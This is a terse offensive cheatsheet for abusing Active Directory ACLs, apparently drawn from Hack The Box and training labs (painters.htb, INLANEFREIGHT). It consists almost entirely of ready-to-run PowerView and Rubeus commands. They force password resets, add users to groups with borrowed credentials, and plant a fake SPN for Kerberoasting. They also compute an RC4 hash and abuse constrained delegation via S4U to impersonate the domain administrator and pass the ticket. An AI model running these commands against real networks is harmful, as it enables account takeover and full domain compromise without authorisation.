Abuse some ACL
Just another cheatsheet
ForceChangePassword
Import-Module .\Power-View.ps1
Set-DomainUserPassword -Domain painters.htb -Identity blake -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Verbose
GenericWrite
Add user to group
$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred -Verbose
Add fake SPN
Set-DomainObject -Credential $Cred -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
Remove SPN
Set-DomainObject -Credential $Cred -Identity adunn -Clear serviceprincipalname -Verbose
AllowedToDelegate

Check the msDS-AllowedToDelegateTo attribute with PowerView
Get-NetUser -TrustedToAuth
Compute the RC4 hash from the cleartext password
Rubeus.exe hash /domain:"DC.painters.htb" /user:"blake" /password:"Password123!"
Pass the ticket
Rubeus.exe s4u /nowrap /msdsspn:"cifs/DC.painters.htb" /impersonateuser:"administrator" /domain:"painters.htb" /user:"blake" /rc4:"2B576ACBE6BCFDA7294D6BD18041B8FE" /ptt